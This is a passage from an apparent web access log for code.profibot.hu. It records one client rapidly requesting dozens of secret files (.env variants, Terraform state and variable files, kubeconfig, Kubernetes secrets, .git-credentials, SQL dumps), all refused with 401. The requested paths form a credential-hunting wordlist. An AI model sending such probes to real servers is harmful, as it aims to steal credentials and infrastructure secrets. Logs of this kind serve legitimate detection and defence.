AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/temp/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/private/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/data/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/vendor/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/node_modules/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/cache/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/uploads/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/files/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/public/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/www/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/plesk/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/html/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/settings/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/static/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/htdocs/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/storage/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/backup/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/admin/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/web/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/conf/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.dist" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.git-credentials" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible; Googlebot/2.1)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/app.env" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/tmp/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/_astro/page.js" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/prod.tfvars" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/ci/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/application.env" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/deploy/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/pipelines/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/lib/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.github/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.gitlab/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/core/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.template" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/terraform.tfvars" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/infra/terraform.tfvars" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/shared/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/iac/terraform.tfvars" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/tf/terraform.tfvars" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/secrets.tfvars" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/production.tfvars" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/storage/framework/.config" [Client 216.81.248.13] [Length 24] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (compatible)" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/terraform.tfstate" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/infrastructure/terraform.tfvars" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/secrets.yml" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/sealed-secrets.yaml" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/variables.tf" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/terraform.tfvars.json" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/charts/values.yaml" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/kubernetes/secrets.yaml" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/kube/secrets.yaml" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/webroot/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/configuration/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/*.auto.tfvars" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.envrc.private" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/docker-compose.local.yml" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/settings.env" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/docker-compose.override.yml" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/dev.tfvars" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.debug/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/docker-compose.secrets.yml" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/helm/values.yaml" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/trace/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.envrc" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.idea/workspace.xml" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.netlify/state.json" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/docker-compose.production.yml" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/staging.tfvars" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.vscode/launch.json" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/supabase/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.default" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/secrets.yaml" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.vscode/settings.json" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.idea/dataSources.xml" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/helm/values-prod.yaml" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/kubeconfig" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/db.sql" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/export.sql" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/database.sql" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/backup/.env.2026" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/config/stripe.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.backup.2026" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.backup.2025" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.2026.bak" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.2026-01" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env_2026" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.2026" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.2025.bak" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.stripe/.env" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/backup/.env.2025" [Client 216.81.248.13] [Length 659] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.202502" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.2025-05" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.2025-06" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.202506" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.2025-07" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.202507" [Client 216.81.248.13] [Length 655] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:00:35:54 +0000] - 401 401 - GET https code.profibot.hu "/.env.2025-02" [Client 216.81.248.13] 